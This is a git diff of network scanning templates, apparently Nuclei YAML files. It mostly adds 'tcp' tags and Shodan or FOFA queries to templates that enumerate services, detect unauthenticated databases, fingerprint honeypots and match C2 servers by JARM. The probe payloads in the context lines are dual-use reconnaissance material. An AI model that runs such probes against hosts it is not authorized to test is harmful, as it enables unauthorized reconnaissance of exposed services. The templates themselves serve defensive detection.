b/network/enumeration/mongodb-info-enum.yaml index e9d2f287a1..dbda8ba16c 100644 --- a/network/enumeration/mongodb-info-enum.yaml +++ b/network/enumeration/mongodb-info-enum.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: mongodb server information - verified: true - tags: network,mongodb,enum - + tags: network,mongodb,enum,tcp tcp: - inputs: - data: 3b0000003c300000ffffffffd40700000000000061646d696e2e24636d640000000000ffffffff14000000106275696c64696e666f000100000000 diff --git a/network/enumeration/niagara-fox-info-enum.yaml b/network/enumeration/niagara-fox-info-enum.yaml index a88e118181..1515a39ec2 100644 --- a/network/enumeration/niagara-fox-info-enum.yaml +++ b/network/enumeration/niagara-fox-info-enum.yaml @@ -9,11 +9,10 @@ info: reference: - https://nmap.org/nsedoc/scripts/fox-info.html metadata: + verified: true max-request: 1 shodan-query: product:"Niagara Fox" - verified: true - tags: network,fox,niagara,enum - + tags: network,fox,niagara,enum,tcp tcp: - inputs: - data: "fox a 1 -1 fox hello\n{\nfox.version=s:1.0\nid=i:1\n};;\n" diff --git a/network/enumeration/psql-user-enum.yaml b/network/enumeration/psql-user-enum.yaml index d453aeed64..c07fbcd29b 100644 --- a/network/enumeration/psql-user-enum.yaml +++ b/network/enumeration/psql-user-enum.yaml @@ -9,11 +9,10 @@ info: reference: - https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007 metadata: + verified: "true" max-request: 1 shodan-query: port:5432 product:"PostgreSQL" - verified: "true" - tags: network,postgresql,db,unauth,enum,psql - + tags: network,postgresql,db,unauth,enum,psql,tcp tcp: - inputs: - data: "{{hex_encode('\u0000\u0000\u0000{{str}}\u0000\u0003\u0000\u0000user\u0000{{users}}\u0000database\u0000{{users}}\u0000application_name\u0000psql\u0000client_encoding\u0000UTF8\u0000\u0000')}}" diff --git a/network/enumeration/smtp/smtp-commands-enum.yaml b/network/enumeration/smtp/smtp-commands-enum.yaml index 6388ecc749..0b5dbb8fed 100644 --- a/network/enumeration/smtp/smtp-commands-enum.yaml +++ b/network/enumeration/smtp/smtp-commands-enum.yaml @@ -9,11 +9,10 @@ info: reference: - https://nmap.org/nsedoc/scripts/smtp-commands.html metadata: - max-request: 4 - shodan-query: smtp verified: true - tags: network,enum,smtp,mail - + max-request: 1 + shodan-query: smtp + tags: network,enum,smtp,mail,tcp tcp: - inputs: - data: "EHLO x\r\n" diff --git a/network/enumeration/smtp/smtp-user-enum.yaml b/network/enumeration/smtp/smtp-user-enum.yaml index 42a5bde0f2..0e427c547d 100644 --- a/network/enumeration/smtp/smtp-user-enum.yaml +++ b/network/enumeration/smtp/smtp-user-enum.yaml @@ -9,10 +9,10 @@ info: reference: - https://nmap.org/nsedoc/scripts/smtp-enum-users.html metadata: - max-request: 4 - shodan-query: smtp verified: true - tags: network,enum,smtp,mail + max-request: 1 + shodan-query: smtp + tags: network,enum,smtp,mail,tcp tcp: - inputs: diff --git a/network/exposures/cisco-smi-exposure.yaml b/network/exposures/cisco-smi-exposure.yaml index 8ee1ea69ba..67e08c76fd 100644 --- a/network/exposures/cisco-smi-exposure.yaml +++ b/network/exposures/cisco-smi-exposure.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,cisco,smi,exposure + tags: network,cisco,smi,exposure,tcp tcp: - inputs: diff --git a/network/exposures/exposed-adb.yaml b/network/exposures/exposed-adb.yaml index f8615f9cd7..16e2cb1d51 100644 --- a/network/exposures/exposed-adb.yaml +++ b/network/exposures/exposed-adb.yaml @@ -11,7 +11,7 @@ info: - https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/ metadata: max-request: 1 - tags: network,adb,rce,android,exposure + tags: network,adb,rce,android,exposure,tcp tcp: - inputs: diff --git a/network/exposures/exposed-dockerd.yaml b/network/exposures/exposed-dockerd.yaml index 4bbec4da52..d5ebbf6c5b 100644 --- a/network/exposures/exposed-dockerd.yaml +++ b/network/exposures/exposed-dockerd.yaml @@ -7,11 +7,10 @@ info: description: | Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. metadata: + verified: true max-request: 1 shodan-query: port:2375 product:"docker" - verified: true - tags: network,docker,exposure - + tags: network,docker,exposure,tcp tcp: - inputs: - data: "Docker:\nVersion:\n" diff --git a/network/exposures/exposed-redis.yaml b/network/exposures/exposed-redis.yaml index 7e561cf726..ea11472061 100644 --- a/network/exposures/exposed-redis.yaml +++ b/network/exposures/exposed-redis.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-306 metadata: max-request: 2 - tags: network,redis,unauth,exposure + tags: network,redis,unauth,exposure,tcp tcp: - inputs: diff --git a/network/exposures/exposed-zookeeper.yaml b/network/exposures/exposed-zookeeper.yaml index 31d8f2b33f..2a402b16f8 100644 --- a/network/exposures/exposed-zookeeper.yaml +++ b/network/exposures/exposed-zookeeper.yaml @@ -9,7 +9,7 @@ info: - https://zookeeper.apache.org/security.html metadata: max-request: 1 - tags: network,zookeeper,unauth,exposure + tags: network,zookeeper,unauth,exposure,tcp tcp: - inputs: diff --git a/network/honeypot/adbhoney-honeypot-cnxn-detect.yaml b/network/honeypot/adbhoney-honeypot-cnxn-detect.yaml index e1cf0c28ef..b23a0b7e66 100644 --- a/network/honeypot/adbhoney-honeypot-cnxn-detect.yaml +++ b/network/honeypot/adbhoney-honeypot-cnxn-detect.yaml @@ -8,13 +8,14 @@ info: ADBHoney honeypot has been identified. The response to the 'adb connect' command differs from real installations, signaling a possible deceptive setup. metadata: - max-request: 1 - product: adb - shodan-query: product:Android Debug Bridge (ADB) && SM-G960F - vendor: android verified: true - tags: adbhoney,android,adb,honeypot,ir,cti,network - + max-request: 1 + vendor: android + product: adb + shodan-query: + - product:Android Debug Bridge (ADB) && SM-G960F + - product:android debug bridge (adb) && sm-g960f + tags: adbhoney,android,adb,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # CNXN diff --git a/network/honeypot/adbhoney-honeypot-shell-detect.yaml b/network/honeypot/adbhoney-honeypot-shell-detect.yaml index 2815e73bb1..6f149773f8 100644 --- a/network/honeypot/adbhoney-honeypot-shell-detect.yaml +++ b/network/honeypot/adbhoney-honeypot-shell-detect.yaml @@ -8,13 +8,14 @@ info: ADBHoney honeypot has been identified. The response to the 'adb shell pwd' command differs from real installations, signaling a possible deceptive setup. metadata: - max-request: 1 - product: adb - shodan-query: product:Android Debug Bridge (ADB) && SM-G960F - vendor: android verified: true - tags: adbhoney,android,adb,honeypot,ir,cti,network - + max-request: 1 + vendor: android + product: adb + shodan-query: + - product:Android Debug Bridge (ADB) && SM-G960F + - product:android debug bridge (adb) && sm-g960f + tags: adbhoney,android,adb,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # CNXN diff --git a/network/honeypot/conpot-siemens-honeypot-detect.yaml b/network/honeypot/conpot-siemens-honeypot-detect.yaml index 6cbeef73bc..657046b336 100644 --- a/network/honeypot/conpot-siemens-honeypot-detect.yaml +++ b/network/honeypot/conpot-siemens-honeypot-detect.yaml @@ -8,13 +8,15 @@ info: A Conpot (Siemens) honeypot has been identified. The response to a first packet of a connection attempt differs from real installations, signaling a possible deceptive setup. metadata: - max-request: 1 verified: true + max-request: 1 vendor: conpot product: siemens - shodan-query: html:"Overview - Siemens, SIMATIC" - tags: conpot,siemens,honeypot,ir,cti,network - + shodan-query: + - html:"Overview - Siemens, SIMATIC" + - http.html:"overview - siemens, simatic" + fofa-query: body="overview - siemens, simatic" + tags: conpot,siemens,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "0300001611e00000000400c1020100c2020102c0010a" diff --git a/network/honeypot/cowrie-ssh-honeypot-detect.yaml b/network/honeypot/cowrie-ssh-honeypot-detect.yaml index da526c0d5a..70749e2433 100644 --- a/network/honeypot/cowrie-ssh-honeypot-detect.yaml +++ b/network/honeypot/cowrie-ssh-honeypot-detect.yaml @@ -9,10 +9,9 @@ info: The response to a wrong SSH version differs from real installations, signaling a possible deceptive setup. metadata: max-request: 1 - product: ssh vendor: cowrie - tags: cowrie,twisted,ssh,honeypot,ir,cti,network - + product: ssh + tags: cowrie,twisted,ssh,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "SSH-1337-OpenSSH_9.0\r\n" diff --git a/network/honeypot/dionaea-ftp-honeypot-detect.yaml b/network/honeypot/dionaea-ftp-honeypot-detect.yaml index b32d00318a..e0f388d162 100644 --- a/network/honeypot/dionaea-ftp-honeypot-detect.yaml +++ b/network/honeypot/dionaea-ftp-honeypot-detect.yaml @@ -9,10 +9,9 @@ info: The response to the 'PASS' command differs from real installations, signaling a possible deceptive setup. metadata: max-request: 1 - product: ftp vendor: dionaea - tags: dionaea,ftp,honeypot,ir,cti,network - + product: ftp + tags: dionaea,ftp,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "USER root\r\n" diff --git a/network/honeypot/dionaea-mqtt-honeypot-detect.yaml b/network/honeypot/dionaea-mqtt-honeypot-detect.yaml index 4c7ab44734..8314e1b352 100644 --- a/network/honeypot/dionaea-mqtt-honeypot-detect.yaml +++ b/network/honeypot/dionaea-mqtt-honeypot-detect.yaml @@ -8,13 +8,14 @@ info: A Dionaea MQTT honeypot has been identified. The response to a MQTTv5 packet differs from real installations, signaling a possible deceptive setup. metadata: - max-request: 1 - product: mqtt - shodan-query: product:"MQTT" - vendor: dionaea verified: true - tags: dionaea,mqtt,honeypot,ir,cti,network - + max-request: 1 + vendor: dionaea + product: mqtt + shodan-query: + - product:"MQTT" + - product:"mqtt" + tags: dionaea,mqtt,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "101000044d5154540502003c032100140000" diff --git a/network/honeypot/dionaea-mysql-honeypot-detect.yaml b/network/honeypot/dionaea-mysql-honeypot-detect.yaml index 6cdc4bab52..6a346b1eef 100644 --- a/network/honeypot/dionaea-mysql-honeypot-detect.yaml +++ b/network/honeypot/dionaea-mysql-honeypot-detect.yaml @@ -9,10 +9,10 @@ info: The response to a connection command differs from real installations, signaling a possible deceptive setup. metadata: max-request: 1 - product: mysql vendor: dionaea - tags: dionaea,mysql,honeypot,ir,cti,network - + product: mysql + shodan-query: product:"mysql" + tags: dionaea,mysql,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "\x4a\x00\x00\x00\x0a\x35\x2e\x31\x2e\x32\x39\x00\x0b\x00\x00\x00\x21\x3e\x34\x1b\x51\x3f\x34\x33\x60\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" diff --git a/network/honeypot/dionaea-smb-honeypot-detect.yaml b/network/honeypot/dionaea-smb-honeypot-detect.yaml index 49d89e5226..e2af0c93c1 100644 --- a/network/honeypot/dionaea-smb-honeypot-detect.yaml +++ b/network/honeypot/dionaea-smb-honeypot-detect.yaml @@ -9,11 +9,10 @@ info: The response to an SMB connection packet differs from real installations, signaling a possible deceptive setup. metadata: max-request: 1 - shodan-query: port:445 vendor: dionaea product: dionaea - tags: dionaea,smb,honeypot,ir,cti,network - + shodan-query: port:445 + tags: dionaea,smb,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "00000045ff534d4272000000000801c8000000000000000000000000ffff0100ffff0000002200024e54204c4d20302e31320002534d4220322e3030320002534d4220322e3f3f3f00" diff --git a/network/honeypot/gaspot-honeypot-detect.yaml b/network/honeypot/gaspot-honeypot-detect.yaml index 9eb681263d..1e4c39adf8 100644 --- a/network/honeypot/gaspot-honeypot-detect.yaml +++ b/network/honeypot/gaspot-honeypot-detect.yaml @@ -9,11 +9,10 @@ info: The response to the '^AI21400' command differs from real installations, signaling a possible deceptive setup. metadata: max-request: 1 + vendor: gaspot product: veeder-root shodan-query: port:10001 - vendor: gaspot - tags: gaspot,veeder-root,ics,honeypot,ir,cti,network - + tags: gaspot,veeder-root,ics,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "^AI21400" diff --git a/network/honeypot/mailoney-honeypot-detect.yaml b/network/honeypot/mailoney-honeypot-detect.yaml index 5f1defcd34..72b9c8e91d 100644 --- a/network/honeypot/mailoney-honeypot-detect.yaml +++ b/network/honeypot/mailoney-honeypot-detect.yaml @@ -9,10 +9,10 @@ info: The response to the 'HELP' command differs from real installations, signaling a possible deceptive setup. metadata: max-request: 1 - product: exim vendor: mailoney - tags: mailoney,exim,smtp,honeypot,ir,cti,network - + product: exim + shodan-query: cpe:"cpe:2.3:a:exim:exim" + tags: mailoney,exim,smtp,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "HELP\r\n" diff --git a/network/honeypot/redis-honeypot-detect.yaml b/network/honeypot/redis-honeypot-detect.yaml index 5f4ff72394..7052be60df 100644 --- a/network/honeypot/redis-honeypot-detect.yaml +++ b/network/honeypot/redis-honeypot-detect.yaml @@ -11,11 +11,12 @@ info: cpe: cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: redis - shodan-query: redis vendor: redis - tags: redis,honeypot,ir,cti,network - + product: redis + shodan-query: + - redis + - redis_version + tags: redis,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "QUIT" diff --git a/network/jarm/c2/cobalt-strike-c2-jarm.yaml b/network/jarm/c2/cobalt-strike-c2-jarm.yaml index d60ce89b52..39601ecb44 100644 --- a/network/jarm/c2/cobalt-strike-c2-jarm.yaml +++ b/network/jarm/c2/cobalt-strike-c2-jarm.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1+port:443 - tags: jarm,network,c2,ir,osint,cti,cobalt-strike + tags: jarm,network,c2,ir,osint,cti,cobalt-strike,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/covenant-c2-jarm.yaml b/network/jarm/c2/covenant-c2-jarm.yaml index 0589a5d0bf..e86d244e78 100644 --- a/network/jarm/c2/covenant-c2-jarm.yaml +++ b/network/jarm/c2/covenant-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://twitter.com/MichalKoczwara/status/1548685058403360770 metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,covenant + tags: jarm,network,c2,ir,osint,cti,covenant,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/deimos-c2-jarm.yaml b/network/jarm/c2/deimos-c2-jarm.yaml index 098e0d79a8..bf1ee183f0 100644 --- a/network/jarm/c2/deimos-c2-jarm.yaml +++ b/network/jarm/c2/deimos-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://twitter.com/MichalKoczwara/status/1551632627387473920 metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,deimos,network + tags: jarm,c2,ir,osint,cti,deimos,network,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/evilginx2-jarm.yaml b/network/jarm/c2/evilginx2-jarm.yaml index eb3ca54cd4..85efbd2517 100644 --- a/network/jarm/c2/evilginx2-jarm.yaml +++ b/network/jarm/c2/evilginx2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/kgretzky/evilginx2 metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,evilginx2,phishing + tags: jarm,network,c2,ir,osint,cti,evilginx2,phishing,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/generic-c2-jarm.yaml b/network/jarm/c2/generic-c2-jarm.yaml index ba02a7897e..c51265b260 100644 --- a/network/jarm/c2/generic-c2-jarm.yaml +++ b/network/jarm/c2/generic-c2-jarm.yaml @@ -10,7 +10,7 @@ info: - https://github.com/MichaelKoczwara/C2JARM metadata: max-request: 1 - tags: network,jarm,c2,ir,osint,cti + tags: network,jarm,c2,ir,osint,cti,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/grat2-c2-jarm.yaml b/network/jarm/c2/grat2-c2-jarm.yaml index 02ea45e886..b2e4162165 100644 --- a/network/jarm/c2/grat2-c2-jarm.yaml +++ b/network/jarm/c2/grat2-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/r3nhat/GRAT2 metadata: max-request: 1 - tags: c2,jarm,network,ir,osint,cti,shad0w + tags: c2,jarm,network,ir,osint,cti,shad0w,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/havoc-c2-jarm.yaml b/network/jarm/c2/havoc-c2-jarm.yaml index 7ccd6850f7..f4fb946ebd 100644 --- a/network/jarm/c2/havoc-c2-jarm.yaml +++ b/network/jarm/c2/havoc-c2-jarm.yaml @@ -13,7 +13,7 @@ info: verified: "true" max-request: 1 shodan-query: 'ssl:postalCode=3540 ssl.jarm:3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e' - tags: jarm,c2,ir,osint,cti,havoc,network + tags: jarm,c2,ir,osint,cti,havoc,network,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/mac-c2-jarm.yaml b/network/jarm/c2/mac-c2-jarm.yaml index e10e035f49..3c10258199 100644 --- a/network/jarm/c2/mac-c2-jarm.yaml +++ b/network/jarm/c2/mac-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/cedowens/MacC2 metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,macc2 + tags: jarm,network,c2,ir,osint,cti,macc2,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/macshell-c2-jarm.yaml b/network/jarm/c2/macshell-c2-jarm.yaml index 78e2e3e956..3efd1cfe00 100644 --- a/network/jarm/c2/macshell-c2-jarm.yaml +++ b/network/jarm/c2/macshell-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/cedowens/MacShellSwift metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,macshell + tags: jarm,network,c2,ir,osint,cti,macshell,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/merlin-c2-jarm.yaml b/network/jarm/c2/merlin-c2-jarm.yaml index b43ccbf94c..efb2195b4d 100644 --- a/network/jarm/c2/merlin-c2-jarm.yaml +++ b/network/jarm/c2/merlin-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://merlin-c2.readthedocs.io/en/latest/ metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,merlin + tags: jarm,network,c2,ir,osint,cti,merlin,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/metasploit-c2-jarm.yaml b/network/jarm/c2/metasploit-c2-jarm.yaml index fb8f6e89e8..72cae7ea12 100644 --- a/network/jarm/c2/metasploit-c2-jarm.yaml +++ b/network/jarm/c2/metasploit-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,metasploit + tags: jarm,network,c2,ir,osint,cti,metasploit,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/mythic-c2-jarm.yaml b/network/jarm/c2/mythic-c2-jarm.yaml index e6464bdb08..c61844df73 100644 --- a/network/jarm/c2/mythic-c2-jarm.yaml +++ b/network/jarm/c2/mythic-c2-jarm.yaml @@ -12,7 +12,7 @@ info: - https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,mythic + tags: jarm,network,c2,ir,osint,cti,mythic,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/posh-c2-jarm.yaml b/network/jarm/c2/posh-c2-jarm.yaml index a74933c0dc..4a3a74dfc5 100644 --- a/network/jarm/c2/posh-c2-jarm.yaml +++ b/network/jarm/c2/posh-c2-jarm.yaml @@ -12,7 +12,7 @@ info: - https://poshc2.readthedocs.io/en/latest/ metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,posh + tags: jarm,network,c2,ir,osint,cti,posh,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/shad0w-c2-jarm.yaml b/network/jarm/c2/shad0w-c2-jarm.yaml index 6092db22be..057615fa2d 100644 --- a/network/jarm/c2/shad0w-c2-jarm.yaml +++ b/network/jarm/c2/shad0w-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/bats3c/shad0w metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,shad0w + tags: jarm,network,c2,ir,osint,cti,shad0w,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/silenttrinity-c2-jarm.yaml b/network/jarm/c2/silenttrinity-c2-jarm.yaml index 3bebaa2553..351a64b2eb 100644 --- a/network/jarm/c2/silenttrinity-c2-jarm.yaml +++ b/network/jarm/c2/silenttrinity-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/byt3bl33d3r/SILENTTRINITY metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,silenttrinity + tags: jarm,network,c2,ir,osint,cti,silenttrinity,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/sliver-c2-jarm.yaml b/network/jarm/c2/sliver-c2-jarm.yaml index 968fb52b92..793cd172e9 100644 --- a/network/jarm/c2/sliver-c2-jarm.yaml +++ b/network/jarm/c2/sliver-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/BishopFox/sliver metadata: max-request: 1 - tags: jarm,network,c2,ir,osint,cti,sliver + tags: jarm,network,c2,ir,osint,cti,sliver,tcp tcp: - inputs: - data: 2E diff --git a/network/misconfig/apache-dubbo-unauth.yaml b/network/misconfig/apache-dubbo-unauth.yaml index bd5e4743d4..2060d0eedd 100644 --- a/network/misconfig/apache-dubbo-unauth.yaml +++ b/network/misconfig/apache-dubbo-unauth.yaml @@ -9,11 +9,10 @@ info: reference: - https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/ metadata: - fofa-query: apache dubbo - max-request: 1 verified: true - tags: network,dubbo,apache,unauth,misconfig - + max-request: 1 + fofa-query: apache dubbo + tags: network,dubbo,apache,unauth,misconfig,tcp tcp: - inputs: - data: "68656c700d0a" diff --git a/network/misconfig/apache-rocketmq-broker-unauth.yaml b/network/misconfig/apache-rocketmq-broker-unauth.yaml index 548ceb290d..d091f52aa5 100644 --- a/network/misconfig/apache-rocketmq-broker-unauth.yaml +++ b/network/misconfig/apache-rocketmq-broker-unauth.yaml @@ -9,12 +9,11 @@ info: reference: - https://rocketmq.apache.org/docs/bestPractice/03access metadata: - fofa-query: protocol="rocketmq" + verified: true max-request: 1 shodan-query: title:"RocketMQ" - verified: true - tags: network,rocketmq,broker,apache,unauth,misconfig - + fofa-query: protocol="rocketmq" + tags: network,rocketmq,broker,apache,unauth,misconfig,tcp tcp: - inputs: - data: "000000c9000000b17b22636f6465223a32352c226578744669656c6473223a7b224163636573734b6579223a22726f636b65746d7132222c225369676e6174757265223a222b7a6452645575617a6953516b4855557164727477673146386a6b3d227d2c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3433337d746573745f6b65793d746573745f76616c75650a0a" diff --git a/network/misconfig/clamav-unauth.yaml b/network/misconfig/clamav-unauth.yaml index cd31e75d47..a2d91dc856 100644 --- a/network/misconfig/clamav-unauth.yaml +++ b/network/misconfig/clamav-unauth.yaml @@ -12,11 +12,10 @@ info: - https://seclists.org/nmap-dev/2016/q2/201 - https://bugzilla.clamav.net/show_bug.cgi?id=11585 metadata: + verified: true max-request: 1 shodan-query: port:3310 product:"ClamAV" version:"0.99.2" - verified: true - tags: network,clamav,unauth,seclists,misconfig - + tags: network,clamav,unauth,seclists,misconfig,tcp tcp: - inputs: - data: "SCAN /nonexistent/{{to_lower(rand_text_alpha(10))}}\r\n" diff --git a/network/misconfig/clickhouse-unauth.yaml b/network/misconfig/clickhouse-unauth.yaml index e8460a0350..bfb44326ff 100644 --- a/network/misconfig/clickhouse-unauth.yaml +++ b/network/misconfig/clickhouse-unauth.yaml @@ -7,7 +7,7 @@ info: description: ClickHouse was able to be accessed with no required authentication in place. metadata: max-request: 1 - tags: network,clickhouse,unauth,misconfig + tags: network,clickhouse,unauth,misconfig,tcp tcp: - inputs: diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml index 3e37bd1c95..7afe5dd6ae 100644 --- a/network/misconfig/erlang-daemon.yaml +++ b/network/misconfig/erlang-daemon.yaml @@ -11,11 +11,10 @@ info: - https://book.hacktricks.xyz/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-settings-b1e9173a4bcd metadata: + verified: true max-request: 1 shodan-query: product:"Erlang Port Mapper Daemon" - verified: true - tags: demon,enum,erlang,epmd - + tags: demon,enum,erlang,epmd,network,misconfig,tcp tcp: - inputs: - data: "\x00\x01\x6e" diff --git a/network/misconfig/ganglia-xml-grid-monitor.yaml b/network/misconfig/ganglia-xml-grid-monitor.yaml index 3de2b4a71b..1f1bed29fb 100644 --- a/network/misconfig/ganglia-xml-grid-monitor.yaml +++ b/network/misconfig/ganglia-xml-grid-monitor.yaml @@ -9,7 +9,7 @@ info: - http://ganglia.info/ metadata: max-request: 1 - tags: ganglia,network,misconfig + tags: ganglia,network,misconfig,tcp tcp: - inputs: diff --git a/network/misconfig/memcached-stats.yaml b/network/misconfig/memcached-stats.yaml index 8af382ab72..d1ca4417ea 100644 --- a/network/misconfig/memcached-stats.yaml +++ b/network/misconfig/memcached-stats.yaml @@ -8,7 +8,7 @@ info: Memcached stats is used to return server statistics such as PID, version, connections, etc. metadata: max-request: 1 - tags: network,memcached,misconfig + tags: network,memcached,misconfig,tcp tcp: - inputs: diff --git a/network/misconfig/mongodb-unauth.yaml b/network/misconfig/mongodb-unauth.yaml index c7190ea2e5..3302246c0d 100644 --- a/network/misconfig/mongodb-unauth.yaml +++ b/network/misconfig/mongodb-unauth.yaml @@ -5,15 +5,14 @@ info: author: pdteam severity: high description: MongoDB was able to be accessed with no password. Note that MongoDB does not require a password by default. + remediation: Enable Authentication in MongoDB reference: - https://github.com/orleven/Tentacle - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb - https://www.mongodb.com/features/mongodb-authentication - remediation: Enable Authentication in MongoDB metadata: max-request: 1 - tags: network,mongodb,unauth,misconfig - + tags: network,mongodb,unauth,misconfig,tcp tcp: - inputs: - data: 480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000 diff --git a/network/misconfig/mysql-native-password.yaml b/network/misconfig/mysql-native-password.yaml index 26f6f1cde1..76e4e6054c 100644 --- a/network/misconfig/mysql-native-password.yaml +++ b/network/misconfig/mysql-native-password.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,mysql,db,misconfig + tags: network,mysql,db,misconfig,tcp tcp: - host: diff --git a/network/misconfig/printers-info-leak.yaml b/network/misconfig/printers-info-leak.yaml index 6c01ac8f63..4c3bd0ff5e 100644 --- a/network/misconfig/printers-info-leak.yaml +++ b/network/misconfig/printers-info-leak.yaml @@ -4,14 +4,13 @@ info: name: Unauthorized Printer Access author: pussycat0x severity: info - reference: - - https://book.hacktricks.xyz/pentesting/9100-pjl description: | Unauthorized access to printers allows attackers to print, eavesdrop sensitive documents. + reference: + - https://book.hacktricks.xyz/pentesting/9100-pjl metadata: max-request: 1 - tags: network,iot,printer,misconfig - + tags: network,iot,printer,misconfig,tcp tcp: - inputs: - data: "@PJL INFO STATUS\n" diff --git a/network/misconfig/sap-router-info-leak.yaml b/network/misconfig/sap-router-info-leak.yaml index 928e9f2f2b..aa0f0811c2 100644 --- a/network/misconfig/sap-router-info-leak.yaml +++ b/network/misconfig/sap-router-info-leak.yaml @@ -10,7 +10,7 @@ info: - https://support.sap.com/en/tools/connectivity-tools/saprouter.html metadata: max-request: 1 - tags: network,sap,misconfig,saprouter + tags: network,sap,misconfig,saprouter,tcp tcp: - inputs: diff --git a/network/misconfig/tidb-native-password.yaml b/network/misconfig/tidb-native-password.yaml index 936051dc1a..e0cef548ae 100644 --- a/network/misconfig/tidb-native-password.yaml +++ b/network/misconfig/tidb-native-password.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,tidb,db,misconfig + tags: network,tidb,db,misconfig,tcp tcp: - host: diff --git a/network/misconfig/tidb-unauth.yaml b/network/misconfig/tidb-unauth.yaml index 3d95d6f47b..e99232ea3d 100644 --- a/network/misconfig/tidb-unauth.yaml +++ b/network/misconfig/tidb-unauth.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 zoomeye-query: tidb +port:"4000" - tags: network,tidb,unauth,misconfig + tags: network,tidb,unauth,misconfig,tcp tcp: - inputs: diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml index 90cad1b4ce..6a5f22bdd5 100644 --- a/network/misconfig/unauth-psql.yaml +++ b/network/misconfig/unauth-psql.yaml @@ -9,11 +9,10 @@ info: reference: - https://www.postgresql.org/docs/9.6/auth-methods.html metadata: + verified: "true" max-request: 1 shodan-query: port:5432 product:"PostgreSQL" - verified: "true" - tags: network,postgresql,db,unauth,misconfig - + tags: network,postgresql,db,unauth,misconfig,tcp tcp: - inputs: - data: "00000054000300007573657200706f73746772657300646174616261736500706f737467726573006170706c69636174696f6e5f6e616d65007073716c00636c69656e745f656e636f64696e6700555446380000" # default database postgres diff --git a/network/vulnerabilities/clockwatch-enterprise-rce.yaml b/network/vulnerabilities/clockwatch-enterprise-rce.yaml index 